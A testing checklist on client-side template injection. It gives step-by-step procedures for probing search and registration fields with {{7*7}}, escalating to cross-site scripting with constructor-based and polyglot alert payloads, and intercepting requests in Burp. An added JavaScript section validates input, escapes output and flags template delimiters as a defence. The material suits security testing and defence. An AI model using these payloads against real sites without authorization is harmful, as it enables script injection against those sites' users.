Client Side Template Injection

Check List

Methodology

Black Box

1. Go to any search box on the target

2. Enter this exact payload in the input field

{{7*7}}

3. Submit the form or trigger the search

4. Check the response or rendered page

5. If you see 49, Client-Side Template Injection (CSTI) CONFIRMED

6. Escalate immediately with this XSS payload

{{constructor.constructor('alert(document.domain)')()}}

7. If alert pops, Full XSS via CSTI, CONFIRMED

or

javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert(document.domain)//>

CSTI in the registration process

1. Log in to the target site and complete the account creation process

2. Then trace the request process using Burp Suite

3. In the intercepted account creation request, replace the value of the username field with the payload below and submit the request

>{{7*7}}<img>

4. After creating the account, if the username field contains 49, the vulnerability is confirmed

5. Then we can convert this vulnerability to XSS using the following payload

{{constructor.constructor('alert(`XSS`)')()}}
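Both procedures above confirm CSTI when a reflected value such as {{7*7}} is evaluated by the client-side template engine. The following is an added example, not part of the original checklist, showing one way to handle the same search and username fields defensively. It assumes the page is compiled by AngularJS or Vue from in-DOM templates; the function names and sample requests are constructed for illustration.

```javascript
// Added example, not from the original checklist. Assumes an AngularJS or Vue
// in-DOM template root; every name and sample value below is constructed.

// An opening or closing interpolation delimiter anywhere in the value.
const TEMPLATE_SYNTAX = /\{\{|\}\}/;

function hasTemplateSyntax(value) {
  return TEMPLATE_SYNTAX.test(String(value));
}

// HTML-escape so the value cannot close the wrapper element or open new tags.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Registration field: a username never needs delimiters, so reject them
// instead of storing a value that is later rendered inside a template.
function validateUsername(value) {
  if (hasTemplateSyntax(value)) return { ok: false, reason: 'template delimiters' };
  if (!/^[\w.\- ]{1,64}$/.test(String(value))) return { ok: false, reason: 'charset' };
  return { ok: true };
}

// Reflected free text (a search term): HTML-escaping alone does not stop
// interpolation, because the engine reads the decoded text node. The wrapper
// attributes tell AngularJS (ng-non-bindable) and Vue (v-pre) to skip it.
function renderReflected(value) {
  return '<span ng-non-bindable v-pre>' + escapeHtml(value) + '</span>';
}

// Detection: list the request fields that carry template delimiters.
function flagProbes(requests) {
  return requests
    .filter((r) => hasTemplateSyntax(r.value))
    .map((r) => r.path + ':' + r.field);
}

// Constructed sample requests (not captured traffic).
const sampleRequests = [
  { path: '/search', field: 'q', value: 'blue shoes' },
  { path: '/search', field: 'q', value: '{{7*7}}' },
  { path: '/register', field: 'username', value: '>{{7*7}}<img>' },
];

console.log(flagProbes(sampleRequests));
console.log(renderReflected('>{{7*7}}<img>'));
```

With the wrapper in place the reflected search term is displayed as the literal text {{7*7}} rather than 49, which is the check in step 5 of the first procedure failing as intended.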

White Box

Cheat Sheet
